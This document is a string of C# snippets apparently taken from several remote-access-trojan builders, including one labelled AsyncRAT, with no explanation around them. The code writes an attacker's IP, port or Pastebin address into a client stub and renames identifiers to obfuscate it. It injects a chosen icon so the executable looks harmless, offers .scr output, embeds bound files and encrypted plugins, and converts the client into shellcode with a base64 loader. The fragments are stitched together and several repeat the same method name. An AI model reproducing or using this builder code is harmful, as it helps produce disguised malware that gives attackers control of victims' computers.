private void BuildButton_Click(object sender, RoutedEventArgs e)
{
string errorMsg = "";
if (string.IsNullOrWhiteSpace(ipTextBox.Text))
{
errorMsg = "IP cannot be empty.";
}
else if (string.IsNullOrWhiteSpace(portTextBox.Text))
{
errorMsg = "Port cannot be empty.";
}
else if (generateStubCheckbox.IsChecked == true && string.IsNullOrWhiteSpace(stubEncryptionPasswordTextBox.Text))
{
errorMsg = "Encryption password cannot be empty.";
}
if (errorMsg.Length > 0)
{
MessageBox.Show(errorMsg, "Error", MessageBoxButton.OK, MessageBoxImage.Error);
return;
}
SaveFileDialog dialog = new SaveFileDialog()
{
Filter = "Executable (.exe)|*.exe|Screensaver (.scr)|*.scr"
};
// dialog.Filter = "Exe Files (.exe)|*.exe;
if (dialog.ShowDialog() == true)
{
if (generateStubCheckbox.IsChecked == true)
{
if (!File.Exists(IconFilePath))
{
IconFilePath = null;
}
ZombieBuilder.Build(new ClientSettings(ipTextBox.Text, int.Parse(portTextBox.Text)), "temp.exe");
StubCompiler.Compile("temp.exe", stubEncryptionPasswordTextBox.Text, dialog.FileName, IconFilePath);
File.Delete("temp.exe");
}
else
{
ZombieBuilder.Build(new ClientSettings(ipTextBox.Text, int.Parse(portTextBox.Text)), dialog.FileName);
if (File.Exists(IconFilePath))
{
IconInjector.ChangeIcon(dialog.FileName, IconFilePath);
}
}
}
}
private void slCbtn7_Click_1(object sender, EventArgs e)
{
if (!string.IsNullOrEmpty(slcTextBox5.Text) && !string.IsNullOrEmpty(slcTextBox6.Text))
{
IconInjector.InjectIcon(slcTextBox6.Text, slcTextBox5.Text);
MessageBox.Show("Icon changed!", "", MessageBoxButtons.OK, MessageBoxIcon.Information);
}
else
{
MessageBox.Show("Invalid information!", "Wrong input", MessageBoxButtons.OK, MessageBoxIcon.Error);
}
}
private static void InjectIcon(string pathToTargetExe, SingleIcon icon)
{
// Save icon to a temp file
string tempIcoPath = Path.GetTempFileName();
icon.Save(tempIcoPath);
// Magically inject icon into the target exe
IconInjector.InjectIcon(pathToTargetExe, tempIcoPath);
// Delete temp ico file
File.Delete(tempIcoPath);
}
private static void ChangeIconFromBitmap(string pathToTargetExe, Bitmap bmpIcon)
{
if (bmpIcon.PixelFormat != System.Drawing.Imaging.PixelFormat.Format32bppArgb ||
bmpIcon.Width > 256 ||
bmpIcon.Height > 256)
{
bmpIcon = FixIcon(bmpIcon);
}
// Create icon and save it into temp file
MultiIcon mIco = new MultiIcon();
SingleIcon sIco = mIco.Add("main");
sIco.CreateFrom(bmpIcon, IconOutputFormat.Vista);
string tempIcoPath = System.IO.Path.GetTempFileName();
sIco.Save(tempIcoPath);
// Magically inject icon into target exe
IconInjector.InjectIcon(pathToTargetExe, tempIcoPath);
// Delete temp ico file
System.IO.File.Delete(tempIcoPath);
}
private async void BtnBuild_Click(object sender, EventArgs e)
{
if (!chkPastebin.Checked && listBoxIP.Items.Count == 0 || listBoxPort.Items.Count == 0)
{
return;
}
if (checkBox1.Checked)
{
if (string.IsNullOrWhiteSpace(textFilename.Text) || string.IsNullOrWhiteSpace(comboBoxFolder.Text))
{
return;
}
if (!textFilename.Text.EndsWith("exe"))
{
textFilename.Text += ".exe";
}
}
if (string.IsNullOrWhiteSpace(txtMutex.Text))
{
txtMutex.Text = getRandomCharacters();
}
if (chkPastebin.Checked && string.IsNullOrWhiteSpace(txtPastebin.Text))
{
return;
}
ModuleDefMD asmDef = null;
try
{
using (asmDef = ModuleDefMD.Load(@"Stub/Stub.exe"))
using (SaveFileDialog saveFileDialog1 = new SaveFileDialog())
{
saveFileDialog1.Filter = ".exe (*.exe)|*.exe";
saveFileDialog1.InitialDirectory = Application.StartupPath;
saveFileDialog1.OverwritePrompt = false;
saveFileDialog1.FileName = "Client";
if (saveFileDialog1.ShowDialog() == DialogResult.OK)
{
btnBuild.Enabled = false;
WriteSettings(asmDef);
if (chkObfu.Checked)
{
//EncryptString.DoEncrypt(asmDef);
await Task.Run(() =>
{
Renaming.DoRenaming(asmDef);
});
}
asmDef.Write(saveFileDialog1.FileName);
asmDef.Dispose();
if (btnAssembly.Checked)
{
WriteAssembly(saveFileDialog1.FileName);
}
if (chkIcon.Checked && !string.IsNullOrEmpty(txtIcon.Text))
{
IconInjector.InjectIcon(saveFileDialog1.FileName, txtIcon.Text);
}
MessageBox.Show("Done!", "AsyncRAT | Builder", MessageBoxButtons.OK, MessageBoxIcon.Information);
SaveSettings();
this.Close();
}
}
}
catch (Exception ex)
{
MessageBox.Show(ex.Message, "AsyncRAT | Builder", MessageBoxButtons.OK, MessageBoxIcon.Error);
asmDef?.Dispose();
btnBuild.Enabled = true;
}
}
private void btnShellcode_Click(object sender, EventArgs e)
{
if (!chkPaste_bin.Checked && listBoxIP.Items.Count == 0 || listBoxPort.Items.Count == 0)
{
return;
}
if (checkBox1.Checked)
{
if (string.IsNullOrWhiteSpace(textFilename.Text) || string.IsNullOrWhiteSpace(comboBoxFolder.Text))
{
return;
}
if (!textFilename.Text.EndsWith("exe"))
{
textFilename.Text += ".exe";
}
}
if (string.IsNullOrWhiteSpace(txtMutex.Text))
{
txtMutex.Text = getRandomCharacters();
}
if (chkPaste_bin.Checked && string.IsNullOrWhiteSpace(txtPaste_bin.Text))
{
return;
}
ModuleDefMD asmDef = null;
try
{
using (asmDef = ModuleDefMD.Load(@"Stub/Client.exe"))
{
string Temppath = Path.Combine(Application.StartupPath, @"Stub\tempClient.exe");
if (File.Exists(Temppath))
{
File.Delete(Temppath);
}
File.Copy(Path.Combine(Application.StartupPath, @"Stub\Client.exe"), Temppath);
btnShellcode.Enabled = false;
btnBuild.Enabled = false;
WriteSettings(asmDef, Temppath);
asmDef.Write(Temppath);
asmDef.Dispose();
if (btnAssembly.Checked)
{
WriteAssembly(Temppath);
}
if (chkIcon.Checked && !string.IsNullOrEmpty(txtIcon.Text))
{
IconInjector.InjectIcon(Temppath, txtIcon.Text);
}
string savepath = "";
using (SaveFileDialog saveFileDialog1 = new SaveFileDialog())
{
saveFileDialog1.Filter = ".bin (*.bin)|*.bin";
saveFileDialog1.InitialDirectory = Application.StartupPath;
saveFileDialog1.OverwritePrompt = false;
saveFileDialog1.FileName = "Client";
if (saveFileDialog1.ShowDialog() == DialogResult.OK)
{
savepath = saveFileDialog1.FileName;
}
}
string Donutpath = Path.Combine(Application.StartupPath, @"Plugins\donut.exe");
if (!File.Exists(Donutpath))
{
File.WriteAllBytes(Donutpath, Properties.Resources.donut);
}
Process Process = new Process();
Process.StartInfo.FileName = Donutpath;
Process.StartInfo.CreateNoWindow = true;
Process.StartInfo.Arguments = "-f " + Temppath + " -o " + savepath;
Process.Start();
Process.WaitForExit();
Process.Close();
if (File.Exists(savepath))
{
File.WriteAllText(savepath + "loader.cs", Properties.Resources.ShellcodeLoader.Replace("%qwqdanchun%", Convert.ToBase64String(File.ReadAllBytes(savepath))));
File.WriteAllText(savepath + ".b64", Convert.ToBase64String(File.ReadAllBytes(savepath)));
}
File.Delete(Temppath);
File.Delete(Donutpath);
MessageBox.Show("Done!", "Builder", MessageBoxButtons.OK, MessageBoxIcon.Information);
SaveSettings();
this.Close();
}
}
catch (Exception ex)
{
MessageBox.Show(ex.Message, "Builder", MessageBoxButtons.OK, MessageBoxIcon.Error);
asmDef?.Dispose();
btnBuild.Enabled = true;
}
}
private void BtnBuild_Click(object sender, EventArgs e)
{
if (listBoxIP.Items.Count == 0 || listBoxPort.Items.Count == 0)
{
return;
}
if (checkBox1.Checked)
{
if (string.IsNullOrWhiteSpace(textFilename.Text) || string.IsNullOrWhiteSpace(comboBoxFolder.Text))
{
return;
}
if (!textFilename.Text.EndsWith("exe"))
{
textFilename.Text += ".exe";
}
}
if (string.IsNullOrWhiteSpace(txtMutex.Text))
{
txtMutex.Text = Guid.NewGuid().ToString().Substring(20);
}
if (chkPastebin.Checked && string.IsNullOrWhiteSpace(txtPastebin.Text))
{
return;
}
try
{
using (AssemblyDefinition asmDef = AssemblyDefinition.ReadAssembly(@"Stub/Stub.exe"))
{
WriteSettings(asmDef);
Renamer r = new Renamer(asmDef);
if (!r.Perform())
{
throw new Exception("renaming failed");
}
using (SaveFileDialog saveFileDialog1 = new SaveFileDialog())
{
saveFileDialog1.Filter = ".exe (*.exe)|*.exe";
saveFileDialog1.InitialDirectory = Application.StartupPath;
saveFileDialog1.OverwritePrompt = false;
saveFileDialog1.FileName = "Client";
if (saveFileDialog1.ShowDialog() == DialogResult.OK)
{
r.AsmDef.Write(saveFileDialog1.FileName);
r.AsmDef.Dispose();
if (btnAssembly.Checked)
{
WriteAssembly(saveFileDialog1.FileName);
}
if (chkIcon.Checked && !string.IsNullOrEmpty(txtIcon.Text))
{
IconInjector.InjectIcon(saveFileDialog1.FileName, txtIcon.Text);
}
MessageBox.Show("Done!", "AsyncRAT | Builder", MessageBoxButtons.OK, MessageBoxIcon.Information);
SaveSettings();
this.Close();
}
}
}
}
catch (Exception ex)
{
MessageBox.Show(ex.Message, "AsyncRAT | Builder", MessageBoxButtons.OK, MessageBoxIcon.Error);
}
}
void Client_DataReceived(object sender, NWR_Client.DataReceivedEventArgs e)
{
Invoke((MethodInvoker) delegate
{
PacketReader r = e.Reader;
switch ((Header)e.Header)
{
case Header.BUILD:
int len = r.ReadInt32();
byte[] b = r.ReadBytes(len);
string binderResName = r.ReadString();
string pluginResName = r.ReadString();
MemoryStream ms = new MemoryStream(b);
AssemblyDefinition asm = AssemblyDefinition.ReadAssembly(ms);
ms.Close();
ms.Dispose();
len = 0;
Invoke((MethodInvoker) delegate
{
len = lstBinder.Items.Count;
});
if (len > 0)
{
ms = new MemoryStream();
BinaryWriter wr = new BinaryWriter(ms);
for (int i = 0; i < lstBinder.Items.Count; i++)
{
Invoke((MethodInvoker) delegate
{
string name = lstBinder.Items[i].Text;
string fileName = lstBinder.Items[i].SubItems[1].Text;
byte[] file = File.ReadAllBytes(fileName);
wr.Write(name);
wr.Write(file.Length);
wr.Write(file);
});
}
wr.Close();
byte[] bData = Encryption.Encrypt(ms.ToArray(), false);
EmbeddedResource bRes = new EmbeddedResource(binderResName, ManifestResourceAttributes.Private, bData);
asm.MainModule.Resources.Add(bRes);
ms.Dispose();
}
Invoke((MethodInvoker) delegate
{
len = lstPlugins.CheckedItems.Count;
});
if (len > 0)
{
ms = new MemoryStream();
BinaryWriter br = new BinaryWriter(ms);
Invoke((MethodInvoker) delegate
{
for (int i = 0; i < lstPlugins.CheckedItems.Count; i++)
{
byte[] plugin = GlobalProperties.RawPlugins[(Guid)lstPlugins.CheckedItems[i].Tag];
plugin = Encryption.Encrypt(plugin, false);
br.Write(plugin.Length);
br.Write(plugin);
}
});
br.Close();
byte[] data = Encryption.Encrypt(ms.ToArray(), false);
EmbeddedResource res = new EmbeddedResource(pluginResName, ManifestResourceAttributes.Private, data);
asm.MainModule.Resources.Add(res);
}
asm.Write(saveLoc);
//if (!xCrypt.Checked)
//{
if (GlobalProperties.BuildAssembly != null)
{
if (!string.IsNullOrEmpty(GlobalProperties.BuildAssembly.IconPath))
{
if (GlobalProperties.BuildAssembly.IconPath.ToLower().EndsWith(".exe"))
{
try
{
IconExtractor iconEx = new IconExtractor(GlobalProperties.BuildAssembly.IconPath);
Icon icon = null;
if (iconEx.IconCount > 1)
{
SortedList <int, Icon> icons = new SortedList <int, Icon>();
for (int i = 0; i < iconEx.IconCount; i++)
{
icons.Add(i, iconEx.GetIcon(i));
}
IconSelecterDialog isd = new IconSelecterDialog(icons);
if (isd.ShowDialog() != System.Windows.Forms.DialogResult.OK)
{
icon = iconEx.GetIcon(0);
}
isd.Dispose();
icon = iconEx.GetIcon(isd.Selected);
}
else if (iconEx.IconCount == 1)
{
icon = iconEx.GetIcon(0);
}
else
{
throw new Exception();
}
FileStream fs = new FileStream("Icon.ico", FileMode.Create);
icon.Save(fs);
fs.Close();
}
catch
{
}
}
else if (GlobalProperties.BuildAssembly.IconPath.ToLower().EndsWith(".ico"))
{
File.Copy(GlobalProperties.BuildAssembly.IconPath, "Icon.ico");
}
if (File.Exists("Icon.ico"))
{
IconInjector.InjectIcon("Icon.ico", saveLoc);
File.Delete("Icon.ico");
}
}
}
//}
//else
//{
// byte[] file = File.ReadAllBytes(saveLoc);
// File.Delete(saveLoc);
// BuildCry(file, saveLoc);
//}
MessageBox.Show("Build Successful!", "", MessageBoxButtons.OK, MessageBoxIcon.Information);
break;
}
});
}
